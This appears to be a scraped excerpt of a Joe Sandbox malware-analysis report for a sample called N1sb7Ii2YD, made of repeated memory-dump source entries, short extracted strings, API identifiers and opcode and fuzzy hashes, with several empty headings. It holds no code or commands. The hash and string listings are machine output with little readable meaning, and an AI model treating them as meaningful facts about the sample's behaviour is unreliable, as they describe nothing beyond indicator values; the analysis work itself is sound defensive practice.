                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2312806235.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2312806235.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Uninitialize
                                                                                                                                                                                                                                                    • String ID: PT
                                                                                                                                                                                                                                                    • API String ID: 3861434553-4135314810
                                                                                                                                                                                                                                                    • Opcode ID: 2838c07cfca04fbe2cabb14719c9c0661598261e54099377b9e0bd013184ce3a
                                                                                                                                                                                                                                                    • Instruction ID: 75a7993a4975897b3fffe1a5d6229db9520caabe5b699855c7cd795a636d0404
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2838c07cfca04fbe2cabb14719c9c0661598261e54099377b9e0bd013184ce3a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 68A1C0B4508B818FD326CF69C490A22BFE1EF57300B1996ADC4D25F7A6D339E806CB55
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314041305.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_980000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Uninitialize
                                                                                                                                                                                                                                                    • String ID: PT
                                                                                                                                                                                                                                                    • API String ID: 3861434553-4135314810
                                                                                                                                                                                                                                                    • Opcode ID: 2838c07cfca04fbe2cabb14719c9c0661598261e54099377b9e0bd013184ce3a
                                                                                                                                                                                                                                                    • Instruction ID: 4636bfeb30b32159d2f333ec173a62445ca8ed6e3f33dfe9d654f7b397c4690f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2838c07cfca04fbe2cabb14719c9c0661598261e54099377b9e0bd013184ce3a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0CA1BFB55087918FD726CF29C4A0A62BFE1EF57300B19969CC4E24FB66D339D805CB15
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2312806235.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2312806235.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: "*B$B*B
                                                                                                                                                                                                                                                    • API String ID: 0-3938277345
                                                                                                                                                                                                                                                    • Opcode ID: ca0737ad3b4449c2b88f5e3ab455cb045f7dc09c4e14c18ef94007a83bd96a02
                                                                                                                                                                                                                                                    • Instruction ID: c0ff169c622c87bee100c6609ea31c9af3570951461718032b7520edbb3c94ef
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ca0737ad3b4449c2b88f5e3ab455cb045f7dc09c4e14c18ef94007a83bd96a02
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 53421276A00211DFCB18CF68DC90AAEB7B2FF49310F598179E905AB395D734AD11CB84
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2312806235.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2312806235.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: .$kl
                                                                                                                                                                                                                                                    • API String ID: 0-2631956018
                                                                                                                                                                                                                                                    • Opcode ID: d144eace9ea77f902bcb9140e81b2a0528f571a57748096d515ff42ca28c8b60
                                                                                                                                                                                                                                                    • Instruction ID: 6e525d0f0299ed0e456b3adafb39e2bcab09d4ef44449d93680b2b5d8b67f0fb
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d144eace9ea77f902bcb9140e81b2a0528f571a57748096d515ff42ca28c8b60
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1FE1173A218709CBCB189F78EC5127A73F1FF4A741F4A887DD8818B2A1E7B99950C714
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2312806235.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2312806235.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: BE$de
                                                                                                                                                                                                                                                    • API String ID: 0-1272349043
                                                                                                                                                                                                                                                    • Opcode ID: 4d61e13fd748368ac6030c890ff82cb0220032c3e56c3c983d389722b1fc0e45
                                                                                                                                                                                                                                                    • Instruction ID: 2d7de7b673e5cb152189fb1770f850f450cdad5ace7171a4f245c8b9200c7c18
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4d61e13fd748368ac6030c890ff82cb0220032c3e56c3c983d389722b1fc0e45
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2BD1057264C3544BD728DF2888516AFBBE2AFC2304F19492DE8D1AB391D678C916C787
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314041305.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_980000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: BE$de
                                                                                                                                                                                                                                                    • API String ID: 0-1272349043
                                                                                                                                                                                                                                                    • Opcode ID: 4d61e13fd748368ac6030c890ff82cb0220032c3e56c3c983d389722b1fc0e45
                                                                                                                                                                                                                                                    • Instruction ID: 172f8e26f2f1b265a065be49378dc7588b1f38f55e901c174d16b79b27f12923
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4d61e13fd748368ac6030c890ff82cb0220032c3e56c3c983d389722b1fc0e45
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E2D1397165C3548BD328EF2888516AFFBE2EFC2304F18492DE8D19B396D675C906C782
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314041305.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_980000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: )$IEND
                                                                                                                                                                                                                                                    • API String ID: 0-707183367
                                                                                                                                                                                                                                                    • Opcode ID: 77fecbe1ae68033b4a8663d8c056a40f5f9b3b2dca52a2b3e7224ada374ec122
                                                                                                                                                                                                                                                    • Instruction ID: e2f14486111515ce118efe27d81f6c2dbdf3d4364ec6b36ba1bf45cd88501336
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 77fecbe1ae68033b4a8663d8c056a40f5f9b3b2dca52a2b3e7224ada374ec122
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9AD1C0B19083459FE720EF18C845B5BBBE4EF94304F14892DF9999B381E776D908CB92
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2312806235.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2312806235.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: +oQ$?{;}
                                                                                                                                                                                                                                                    • API String ID: 0-1414831546
                                                                                                                                                                                                                                                    • Opcode ID: 1ee29228f1a6319e217c168091de010b371413e67c26b3c1ec204d280338f3ea
                                                                                                                                                                                                                                                    • Instruction ID: f7e0cf01948a060ca3ae4ae96257901d3d9473cfc3be429b8585dccf822635a3
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1ee29228f1a6319e217c168091de010b371413e67c26b3c1ec204d280338f3ea
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BCB1BFB4E043189FEB20DF68D942B9EBBB0FB45304F1081ADE158AB381D7758946CF96
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2312806235.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2312806235.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: Fg$RU]l
                                                                                                                                                                                                                                                    • API String ID: 0-3680832515
                                                                                                                                                                                                                                                    • Opcode ID: 2cdefad0313fa6e4cc5bdb883f2834b1e6d918137519908ea04b1d30e5e067f0
                                                                                                                                                                                                                                                    • Instruction ID: 6f8db59bce85ef316af4e5eced37d01641f7d5c841364d3efc2c21db6cf2a903
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2cdefad0313fa6e4cc5bdb883f2834b1e6d918137519908ea04b1d30e5e067f0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2171087120D3808BE7398F25D8A57EB7BD2EBD2304F58996DC0C987392DB78440ACB56
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314041305.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_980000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: Fg$RU]l
                                                                                                                                                                                                                                                    • API String ID: 0-3680832515
                                                                                                                                                                                                                                                    • Opcode ID: 212695677cf782d22b69bcc5005693ffe3c19f735568b368facab7bd000f874a
                                                                                                                                                                                                                                                    • Instruction ID: 93cb17790c7f06771d7eaf43b242b593461ad0597354d6193504017849635cfe
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 212695677cf782d22b69bcc5005693ffe3c19f735568b368facab7bd000f874a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1F71D37121D3808BE7798F24C8617EABBD6EBD3318F18996DD0D947293DB39440ACB52
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2312806235.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2312806235.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: O28+$h
                                                                                                                                                                                                                                                    • API String ID: 0-657163135
                                                                                                                                                                                                                                                    • Opcode ID: 8dd85ae810d5b5fecc68ec4464ee5e33d050158683b23acf0f2d06bcda51bc6b
                                                                                                                                                                                                                                                    • Instruction ID: 943cae955c8ebe7c4b26d457fd1afafbf5e793f4316e69c7cecf830d1c43eab0
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8dd85ae810d5b5fecc68ec4464ee5e33d050158683b23acf0f2d06bcda51bc6b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B561BE32B887258BD3149A38A8901B7F791EB55350F88473EDD96873C2E63C9D09C3DA
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2312806235.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2312806235.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                                                                                    • String ID: @$ihgf
                                                                                                                                                                                                                                                    • API String ID: 2994545307-73152791
                                                                                                                                                                                                                                                    • Opcode ID: b76e2e665ab3f88f5f7ecfe080de7e118712eda281a429bd95dd341074e0adb8
                                                                                                                                                                                                                                                    • Instruction ID: cc847ee4b474d0efd8a0440ac8e8375c275344d67ffd0b73ceeb6cce142f8bff
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b76e2e665ab3f88f5f7ecfe080de7e118712eda281a429bd95dd341074e0adb8
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6D413AB1A043018BD714CF24D89277BB7A1FFCA318F14952DD489AB391E739E915C78A
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314041305.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_980000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: @$ihgf
                                                                                                                                                                                                                                                    • API String ID: 0-73152791
                                                                                                                                                                                                                                                    • Opcode ID: f9d2302128f83c98de01ee7664bc871aec8e86cdf99c8f751253d6371e8ab131
                                                                                                                                                                                                                                                    • Instruction ID: 58165820efa1d9d7bd3ebda604599e0189237d2fb2ac30f6f81e199c5598fa34
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f9d2302128f83c98de01ee7664bc871aec8e86cdf99c8f751253d6371e8ab131
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 214102B1A042018BD714CF24C8427BBBBA6FFD2328F14862CE4959B391E735ED05CB92
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314041305.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_980000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: Z\$^P
                                                                                                                                                                                                                                                    • API String ID: 0-3724859648
                                                                                                                                                                                                                                                    • Opcode ID: 4f7f96cc206f4a51d8ad8bab145ebd28e0a9ebd1b083b1ab060fd53171580dc2
                                                                                                                                                                                                                                                    • Instruction ID: 96f4e2a146ef887e8b53c8bde81909fda654c2dd51e73b1789fff2baf7062c67
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4f7f96cc206f4a51d8ad8bab145ebd28e0a9ebd1b083b1ab060fd53171580dc2
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2641C2B1911A00CFCB19CF28C892A63B7B2FF99314B16855CD4968F765E738E802CB55
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2312806235.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2312806235.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: AzB$`rB
                                                                                                                                                                                                                                                    • API String ID: 0-365317308
                                                                                                                                                                                                                                                    • Opcode ID: 7d44a20d46df19d3b9013d5ff9cf62f4e3051a7763f9fbf866a5162179f586f0
                                                                                                                                                                                                                                                    • Instruction ID: 6eccde100400f429e4c459893b2eae1b4256d2ec662aaeb68cc10dd30f14b8df
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7d44a20d46df19d3b9013d5ff9cf62f4e3051a7763f9fbf866a5162179f586f0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 44118BB960C3919FC3049F29D59011BFBE0ABD5708F54DA6CE8C96B312D338DA018B8A
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2312806235.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2312806235.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: AzB$`rB
                                                                                                                                                                                                                                                    • API String ID: 0-365317308
                                                                                                                                                                                                                                                    • Opcode ID: d52ee1f8136c3b98c0a9c934921d80b1beb3214e8eb7b5d6a7a040de55795b14
                                                                                                                                                                                                                                                    • Instruction ID: f6425de8d121e4265380cb8b8556ee32d0ff2cc323f56d540e3951a84df8493e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d52ee1f8136c3b98c0a9c934921d80b1beb3214e8eb7b5d6a7a040de55795b14
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 810169B520D3919FC3049F29D59011BFBE0BBD5708F549A6CE8C96B312D334DA418B4A
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2312806235.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2312806235.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: c$
                                                                                                                                                                                                                                                    • API String ID: 0-2516980088
                                                                                                                                                                                                                                                    • Opcode ID: d3ebbaef30565196f274c8e89b57c4db92bba8447b693202f34b7e37aa6ab2c1
                                                                                                                                                                                                                                                    • Instruction ID: 8ddf10d90ef0e2d4ef8b1445a283de62437e0b874c2761f734db7318cd05b52d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d3ebbaef30565196f274c8e89b57c4db92bba8447b693202f34b7e37aa6ab2c1
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2F6205742087418FD7258F28C8907A7BBF2FF5A310F19866DD4964B792D338E846CB58
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2312806235.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2312806235.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                                                                                    • String ID: f
                                                                                                                                                                                                                                                    • API String ID: 2994545307-1993550816
                                                                                                                                                                                                                                                    • Opcode ID: b56fa113e1547803526c35cf7da8e2f2f175e2de8526c6c496e4d834b1f27acf
                                                                                                                                                                                                                                                    • Instruction ID: c6061003a35e321c419c30bd02a3c4e1c0b56f4f8cbc670ef9e4360bbe252bef
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b56fa113e1547803526c35cf7da8e2f2f175e2de8526c6c496e4d834b1f27acf
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7722EF756083518FD718CF25C880A2BBBE2BBC9314F199A2DE4D587391DBB4EC06CB46
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314041305.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_980000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: f
                                                                                                                                                                                                                                                    • API String ID: 0-1993550816
                                                                                                                                                                                                                                                    • Opcode ID: 63a83f5a27331d9fe3a04257bda5fcaf30bc217a6dc898aca3077588f1bd9e28
                                                                                                                                                                                                                                                    • Instruction ID: 3daca0e7523972dfd265345da2a52fc92aaef116a59acc1194dbdb3b8d75655a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 63a83f5a27331d9fe3a04257bda5fcaf30bc217a6dc898aca3077588f1bd9e28
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2922EE756183518FD718CF29C980B6ABBE6BBC9324F188A2CE5D587391DB74D805CB82
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2312806235.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2312806235.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: A67H
                                                                                                                                                                                                                                                    • API String ID: 0-3389657328
                                                                                                                                                                                                                                                    • Opcode ID: 8cecec2cc2e6e176e845aa1397af3039d5d67745fd03e8a435e279ebfdfa12b2
                                                                                                                                                                                                                                                    • Instruction ID: 0278bb419d5cbe6ad6e5f6493e2644ba58dfc9cb1efb87832400374d385c740d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8cecec2cc2e6e176e845aa1397af3039d5d67745fd03e8a435e279ebfdfa12b2
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A81225B4604601DFC724CF28D891767B7E2FF5A314F15892DE4AA87792D738E882CB58
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314041305.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_980000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: [
                                                                                                                                                                                                                                                    • API String ID: 0-3878419350
                                                                                                                                                                                                                                                    • Opcode ID: 5eb09604ed9747dca5d4520930199d487a8f62beec0cfa78d34f9f01c84922a2
                                                                                                                                                                                                                                                    • Instruction ID: e271337b89cc081c8327b70a43faf60335185e68b0250e03059ef4f81f1939d6
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5eb09604ed9747dca5d4520930199d487a8f62beec0cfa78d34f9f01c84922a2
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 05020F75600702CBCB34CF2DC8D1666B7F2FF96714B19859CC8864BBA5EB39A852CB50
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2312806235.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2312806235.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                                                                                    • String ID: ,)*k
                                                                                                                                                                                                                                                    • API String ID: 2994545307-1228391949
                                                                                                                                                                                                                                                    • Opcode ID: 4474f636d0f39993142f536bedb1d18c14776d8e8a4ad8d1d8b893e1a5d6b483
                                                                                                                                                                                                                                                    • Instruction ID: bb41e8b13f176b197a8e10d4dde50fa6e0ce8ca76c9034d38a3517968bb0ad29
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4474f636d0f39993142f536bedb1d18c14776d8e8a4ad8d1d8b893e1a5d6b483
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F4C15A75A083116FD724DF21D881A2BB7E2ABDE704F16AA2EE5C553781D638DC04C78A
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314041305.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_980000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: ,)*k
                                                                                                                                                                                                                                                    • API String ID: 0-1228391949
